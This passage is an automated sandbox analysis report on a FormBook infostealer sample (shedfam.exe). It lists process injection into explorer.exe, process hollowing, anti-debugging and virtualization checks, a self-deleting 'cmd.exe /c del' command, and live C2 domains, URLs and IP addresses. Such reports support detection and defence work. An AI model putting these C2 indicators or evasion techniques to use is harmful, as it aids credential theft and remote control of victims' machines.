          Source: explorer.exe, 00000003.00000000.331131517.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
          Source: explorer.exe, 00000003.00000000.261007312.0000000005063000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
          Source: explorer.exe, 00000003.00000000.271013770.0000000008FD3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00EE5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,1_2_00EE5D13
          Source: C:\Users\user\Desktop\shedfam.exeCode function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00405620
          Source: C:\Users\user\Desktop\shedfam.exeCode function: 0_2_00405FF6 FindFirstFileA,FindClose,0_2_00405FF6
          Source: C:\Users\user\Desktop\shedfam.exeCode function: 0_2_00402654 FindFirstFileA,0_2_00402654
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F34005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00F34005
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F3C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_00F3C2FF
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F3494A GetFileAttributesW,FindFirstFileW,FindClose,1_2_00F3494A
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F3CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_00F3CD9F
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F3CD14 FindFirstFileW,FindClose,1_2_00F3CD14
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F3F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00F3F5D8
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F3F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00F3F735
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F3FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_00F3FA36
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F33CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00F33CE2
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F4C6D9 LoadLibraryA,GetProcAddress,1_2_00F4C6D9
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_03AF0149 mov eax, dword ptr fs:[00000030h]1_2_03AF0149
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_03AF0005 mov eax, dword ptr fs:[00000030h]1_2_03AF0005
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_03AF0019 mov eax, dword ptr fs:[00000030h]1_2_03AF0019
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_03AF007A mov eax, dword ptr fs:[00000030h]1_2_03AF007A
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00EE5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,1_2_00EE5240
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F05CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_00F05CAC
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F288CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,1_2_00F288CD
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_00409AB0 rdtsc 2_2_00409AB0
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_0040ACF0 LdrLoadDll,2_2_0040ACF0
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F445D5 BlockInput,1_2_00F445D5
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00EFA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00EFA385
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00EFA354 SetUnhandledExceptionFilter,1_2_00EFA354
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_00EFA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00EFA385

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\explorer.exeNetwork Connect: 18.167.242.213 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 103.100.63.146 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.111lll.xyz
          Source: C:\Windows\explorer.exeDomain query: www.73129.vip
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\kmhbvf.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeSection unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 120000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeThread register set: target process: 3452Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeThread register set: target process: 3452Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEThread register set: target process: 3452Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F31AC6 SendInput,keybd_event,1_2_00F31AC6
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeProcess created: C:\Users\user\AppData\Local\Temp\kmhbvf.exe C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\kmhbvf.exe"Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F29369 LogonUserW,1_2_00F29369
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00EE5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,1_2_00EE5240
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F351E2 mouse_event,1_2_00F351E2
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F34F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,1_2_00F34F1C
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F288CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,1_2_00F288CD
          Source: shedfam.exe, 00000000.00000002.258371717.00000000029FF000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000001.00000000.244367658.0000000000F86000.00000002.00000001.01000000.00000004.sdmp, kmhbvf.exe, 00000002.00000000.249911083.0000000000F86000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: explorer.exe, 00000003.00000000.321880646.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.294317706.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.258322035.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program ManagerT7<=ge
          Source: kmhbvf.exe, explorer.exe, 00000003.00000000.303545502.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.271730124.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.299459459.0000000006770000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.321880646.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.294317706.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.258322035.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.257495266.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.321537541.0000000001378000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CProgmanile
          Source: explorer.exe, 00000003.00000000.321880646.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.294317706.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.258322035.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00EF885B cpuid 1_2_00EF885B
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F10030 GetLocalTime,__swprintf,1_2_00F10030
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F0416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,1_2_00F0416A
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F10722 GetUserNameW,1_2_00F10722
          Source: C:\Users\user\Desktop\shedfam.exeCode function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040324F

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: kmhbvf.exeBinary or memory string: WIN_81
          Source: kmhbvf.exeBinary or memory string: WIN_XP
          Source: kmhbvf.exeBinary or memory string: WIN_XPe
          Source: kmhbvf.exeBinary or memory string: WIN_VISTA
          Source: kmhbvf.exeBinary or memory string: WIN_7
          Source: kmhbvf.exeBinary or memory string: WIN_8
          Source: kmhbvf.exe.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F4696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,1_2_00F4696E
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F46E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,1_2_00F46E32
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          2
          Valid Accounts
          12
          Native API
          2
          Valid Accounts
          1
          Exploitation for Privilege Escalation
          1
          Disable or Modify Tools
          1
          Credential API Hooking
          2
          System Time Discovery
          Remote Services1
          Archive Collected Data
          Exfiltration Over Other Network Medium4
          Ingress Tool Transfer
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Shared Modules
          Boot or Logon Initialization Scripts2
          Valid Accounts
          1
          Deobfuscate/Decode Files or Information
          21
          Input Capture
          1
          Account Discovery
          Remote Desktop Protocol1
          Credential API Hooking
          Exfiltration Over Bluetooth1
          Encrypted Channel
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)21
          Access Token Manipulation
          3
          Obfuscated Files or Information
          Security Account Manager1
          System Network Connections Discovery
          SMB/Windows Admin Shares21
          Input Capture
          Automated Exfiltration3
          Non-Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)512
          Process Injection
          1
          Software Packing
          NTDS2
          File and Directory Discovery
          Distributed Component Object Model2
          Clipboard Data
          Scheduled Transfer13
          Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Rootkit
          LSA Secrets115
          System Information Discovery
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common2
          Valid Accounts
          Cached Domain Credentials151
          Security Software Discovery
          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items2
          Virtualization/Sandbox Evasion
          DCSync2
          Virtualization/Sandbox Evasion
          Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job21
          Access Token Manipulation
          Proc Filesystem3
          Process Discovery
          Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)512
          Process Injection
          /etc/passwd and /etc/shadow1
          Application Window Discovery
          Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
          System Owner/User Discovery
          Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
          Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput Capture1
          Remote System Discovery
          Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
          Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeylogging1
          System Network Configuration Discovery
          Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 756041 Sample: shedfam.exe Startdate: 29/11/2022 Architecture: WINDOWS Score: 100 34 www.autonomaat.com 2->34 50 Malicious sample detected (through community Yara rule) 2->50 52 Yara detected FormBook 2->52 54 C2 URLs / IPs found in malware configuration 2->54 56 Modifies the prolog of user mode functions (user mode inline hooks) 2->56 12 shedfam.exe 20 2->12         started        signatures3 process4 file5 32 C:\Users\user\AppData\Local\Temp\kmhbvf.exe, PE32 12->32 dropped 15 kmhbvf.exe 12->15         started        process6 signatures7 70 Machine Learning detection for dropped file 15->70 72 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 15->72 74 Maps a DLL or memory area into another process 15->74 76 Tries to detect virtualization through RDTSC time measurements 15->76 18 kmhbvf.exe 15->18         started        process8 signatures9 42 Modifies the context of a thread in another process (thread injection) 18->42 44 Maps a DLL or memory area into another process 18->44 46 Sample uses process hollowing technique 18->46 48 Queues an APC in another process (thread injection) 18->48 21 explorer.exe 18->21 injected process10 dnsIp11 36 www.73129.vip 103.100.63.146, 49700, 80 YISUCLOUDLTD-AS-APYISUCLOUDLTDHK China 21->36 38 fbcuj92a.n.sktcks.com 18.167.242.213, 49699, 80 AMAZON-02US United States 21->38 40 2 other IPs or domains 21->40 58 System process connects to network (likely due to code injection or exploit) 21->58 60 Performs DNS queries to domains with low reputation 21->60 62 Uses netstat to query active network connections and open ports 21->62 25 NETSTAT.EXE 21->25         started        signatures12 process13 signatures14 64 Modifies the context of a thread in another process (thread injection) 25->64 66 Maps a DLL or memory area into another process 25->66 68 Tries to detect virtualization through RDTSC time measurements 25->68 28 cmd.exe 1 25->28         started        process15 process16 30 conhost.exe 28->30         started       

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          No Antivirus matches
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\kmhbvf.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\kmhbvf.exe2%ReversingLabs
          SourceDetectionScannerLabelLinkDownload
          2.0.kmhbvf.exe.400000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.shedfam.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
          1.2.kmhbvf.exe.3b00000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.2.kmhbvf.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.0.shedfam.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
          SourceDetectionScannerLabelLink
          www.autonomaat.com1%VirustotalBrowse
          SourceDetectionScannerLabelLink
          http://www.111lll.xyz/sk19/?6lu=u4lk2PnXcU0u2VBKyLJoTfxxVYVxHm+9jz8FSZNawyXEtvRDPmLLRjoruE33sVgH1sLP&u4=pVhTtd7pjTy0%Avira URL Cloudsafe
          http://www.73129.vip/sk19/?6lu=QEAmWZfTRhzoING4/pUtXBuIHlMFTiZNz3G0bLc7Fgt63bTZUMXUq+W3t0nrgTJvEVvm&u4=pVhTtd7pjTy0%Avira URL Cloudsafe
          www.justbeand.com/sk19/0%Avira URL Cloudsafe
          http://gcsahrz23.xyz/0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          fbcuj92a.n.sktcks.com
          18.167.242.213
          truetrue
            unknown
            www.autonomaat.com
            54.67.42.145
            truefalseunknown
            www.73129.vip
            103.100.63.146
            truetrue
              unknown
              www.111lll.xyz
              unknown
              unknowntrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                http://www.111lll.xyz/sk19/?6lu=u4lk2PnXcU0u2VBKyLJoTfxxVYVxHm+9jz8FSZNawyXEtvRDPmLLRjoruE33sVgH1sLP&u4=pVhTtd7pjTytrue
                • Avira URL Cloud: safe
                unknown
                www.justbeand.com/sk19/true
                • Avira URL Cloud: safe
                low
                http://www.73129.vip/sk19/?6lu=QEAmWZfTRhzoING4/pUtXBuIHlMFTiZNz3G0bLc7Fgt63bTZUMXUq+W3t0nrgTJvEVvm&u4=pVhTtd7pjTytrue
                • Avira URL Cloud: safe
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://www.autoitscript.com/autoit3/Jshedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmp, kmhbvf.exe, 00000002.00000000.252060134.0000000000F99000.00000002.00000001.01000000.00000004.sdmp, explorer.exe, 00000003.00000000.294072289.0000000001425000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.305847313.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.257903286.0000000001425000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.333339547.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.280708898.000000000F276000.00000004.00000001.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.drfalse
                  high
                  http://nsis.sf.net/NSIS_Errorshedfam.exefalse
                    high
                    http://nsis.sf.net/NSIS_ErrorErrorshedfam.exefalse
                      high
                      http://gcsahrz23.xyz/NETSTAT.EXE, 0000000D.00000002.518369394.0000000003D9F000.00000004.10000000.00040000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.autoitscript.com/autoit3/shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.drfalse
                        high
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        18.167.242.213
                        fbcuj92a.n.sktcks.comUnited States
                        16509AMAZON-02UStrue
                        103.100.63.146
                        www.73129.vipChina
                        136970YISUCLOUDLTD-AS-APYISUCLOUDLTDHKtrue
                        Joe Sandbox Version:36.0.0 Rainbow Opal
                        Analysis ID:756041
                        Start date and time:2022-11-29 15:11:10 +01:00
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 9m 5s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Sample file name:shedfam.exe
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:17
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:1
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
